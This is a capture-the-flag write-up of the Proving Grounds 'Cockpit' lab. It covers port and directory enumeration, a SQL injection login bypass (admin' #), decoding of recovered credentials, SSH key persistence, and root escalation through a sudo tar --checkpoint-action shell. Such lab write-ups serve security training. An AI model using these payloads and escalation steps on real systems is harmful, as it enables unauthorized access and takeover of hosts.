Cockpit

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.223.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 13:12 +08
Nmap scan report for 192.168.223.10
Host is up (0.0097s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: blaze
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|     margin: 0 0 10px;
|_    @font-face {
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-06-06T05:12:41
|_Not valid after:  2124-05-13T05:12:41
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94SVN%T=SSL%I=7%D=6/6%Time=6661458B%P=x86_64-pc-linux-
SF:gnu%r(GetRequest,E45,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Typ
SF:e:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-
SF:DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Co
SF:ntent-Type-Options:\x20nosniff\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\
SF:n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</tit
SF:le>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"
SF:text/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewpor
SF:t\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20
SF:\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x2
SF:0Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0font-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20l
SF:ine-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20margin:\x200\x200\x2010px;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20@font-face\x20{\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20")%r(HTTPOptions,E45,"HTTP/1\.1\x20400\x20B
SF:ad\x20request\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfe
SF:r-Encoding:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Po
SF:licy:\x20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\n\r\n29\r\
SF:n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBa
SF:d\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"
SF:Content-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20\x2
SF:0\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini
SF:tial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDisplay\",\x20\"Open
SF:\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20line-height:\x201\.66666667;\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200\x200\x20
SF:10px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20@font-face\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.84 seconds

Initial Access

Port 9090

There is a service running on port 9090.

After some searching online, it could be some linux browser based administration platform.

There is a vulnerability online.

Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)Exploit Database

Port 80

There is also a web server running at port 80.

Directory Enumeration

$ feroxbuster -u http://192.168.223.10 -b 404

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.223.10
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🤯  Header                │ Cookie: 
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      313c http://192.168.223.10/js => http://192.168.223.10/js/
200      GET      278l      506w     5366c http://192.168.223.10/css/index.css
301      GET        9l       28w      314c http://192.168.223.10/css => http://192.168.223.10/css/
200      GET       29l       60w      477c http://192.168.223.10/css/type.css
301      GET        9l       28w      314c http://192.168.223.10/img => http://192.168.223.10/img/
200      GET      707l     4190w   598838c http://192.168.223.10/img/blaze.png
200      GET       29l       85w      913c http://192.168.223.10/js/index.js
200      GET       78l      321w     3349c http://192.168.223.10/
200      GET       65l      128w     1108c http://192.168.223.10/css/style.css
[####################] - 11s    30010/30010   0s      found:9       errors:0      
[####################] - 10s    30000/30000   2994/s  http://192.168.223.10/ 
[####################] - 3s     30000/30000   9334/s  http://192.168.223.10/js/ => Directory listing
[####################] - 2s     30000/30000   12215/s http://192.168.223.10/css/ => Directory listing
[####################] - 0s     30000/30000   92025/s http://192.168.223.10/img/ => Directory listing

After scanning UDP, there is no special results.

$ sudo nmap -sU -sV -Pn -oN udp-nmap 192.168.155.10
[sudo] password for ranay: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:13 +08
Nmap scan report for 192.168.155.10
Host is up (0.0080s latency).
All 1000 scanned ports on 192.168.155.10 are in ignored states.
Not shown: 1000 closed udp ports (port-unreach)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1009.50 seconds

Since we know the hostname is blaze, we can try to add it to host files on our kali machine.

$ echo "192.168.155.10 blaze.offsec" | sudo tee -a /etc/hosts
[sudo] password for ranay: 
192.168.155.10 blaze.offsec

We will then run virtual host enumeration.

$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://blaze.offsec -H "HOST:FUZZ.blaze.offsec" > vhost-result.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://blaze.offsec
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt
 :: Header           : Host: FUZZ.blaze.offsec
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [151265/151265] :: Job [1/1] :: 5128 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

However, there is no interesting result.

We will rerun the directory enumeration again with another tool.

$ dirsearch -u http://blaze.offsec
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                           
                                                                                                                                                                                                                  
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ranay/Desktop/PG/Cockpit/reports/http_blaze.offsec/_24-06-07_09-40-24.txt

Target: http://blaze.offsec/

[09:40:24] Starting:                                                                                                                                                                                              
[09:40:25] 403 -  277B  - /.ht_wsr.txt                                      
[09:40:25] 403 -  277B  - /.htaccess.bak1                                   
[09:40:25] 403 -  277B  - /.htaccess.sample                                 
[09:40:25] 403 -  277B  - /.htaccess.save
[09:40:25] 403 -  277B  - /.htaccess.orig
[09:40:25] 403 -  277B  - /.htaccess_extra                                  
[09:40:25] 403 -  277B  - /.htaccess_orig
[09:40:25] 403 -  277B  - /.htaccess_sc
[09:40:25] 403 -  277B  - /.htaccessBAK                                     
[09:40:25] 403 -  277B  - /.htaccessOLD2
[09:40:25] 403 -  277B  - /.htaccessOLD                                     
[09:40:25] 403 -  277B  - /.htm                                             
[09:40:25] 403 -  277B  - /.html
[09:40:25] 403 -  277B  - /.htpasswd_test                                   
[09:40:25] 403 -  277B  - /.htpasswds                                       
[09:40:25] 403 -  277B  - /.httr-oauth                                      
[09:40:26] 403 -  277B  - /.php                                             
[09:40:26] 301 -  309B  - /js  ->  http://blaze.offsec/js/                  
[09:40:36] 301 -  310B  - /css  ->  http://blaze.offsec/css/                
[09:40:39] 301 -  310B  - /img  ->  http://blaze.offsec/img/                
[09:40:40] 200 -  454B  - /js/                                              
[09:40:41] 200 -  379B  - /login.php                                        
[09:40:42] 302 -    0B  - /logout.php  ->  login.php                        
[09:40:48] 403 -  277B  - /server-status                                    
[09:40:48] 403 -  277B  - /server-status/                                   
                                                                             
Task Completed

There is a login.php available on the website.

If we try the usual username and password such as admin:admin or admin:password, it does not seems to work.

SQLi Vulnerability

If we just put ' on the username field, we are returned with this error.

From this error message, we know that the website is using a MySQL server to conduct authentication and this field is vulnerable to SQLi Attacks.

However, when we tried this payload 'or '1' = '1 for both the username and password, we will get this instead.

Auth bypass

After some searching online, we will try with this payload: admin' # and put only in the username field, we are able to login in.

From there, we can see the username and password of 2 different users.

james:Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron:dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy

We will now try these credentials on the login we see on port 9090.

james's password looks like it is encoded with base64. So we will try to decode using the decoder online.

From here we can see the password for james is canttouchhhthiss@455152.

We will try this on the server login and we are able to login.

We just need to click on Terminal to get the user shell.

Privilege Escalation

Logging in as james using SSH

First, we will put our public key into authorized_keys file in the user.

$ cat id_ed25519.pub                                          
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBuE1aqP7kQOXBtS+Y8ZCBEiMXvXDAGyAjojeSJmV36P ranay@kali

james@blaze:~$ mkdir .ssh
james@blaze:~$ cd .ssh
james@blaze:~/.ssh$ dir
james@blaze:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBuE1aqP7kQOXBtS+Y8ZCBEiMXvXDAGyAjojeSJmV36P ranay@kali" > authorized_keys

Next, we will just ssh into the system using our private key.

$ ssh -i id_ed25519 james@blaze.offsec

Sudo -l

When we run sudo -l, we can see that the user can run this.

james@blaze:~$ sudo -l
Matching Defaults entries for james on blaze:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

After some searching online, we come across this.

tar | GTFOBinsgtfobins.github.io

We will modify the command abit to fit what it shown in the website. After executing it we are able to get root access.

$ sudo tar -czvf /tmp/backup.tar.gz /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
/dev/null
/dev/null
# whoami
root

PreviousClue NextCodo

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagPort 9090

hashtagPort 80

hashtagDirectory Enumeration

hashtagSQLi Vulnerability

hashtagAuth bypass

hashtagPrivilege Escalation

hashtagLogging in as james using SSH

hashtagSudo -l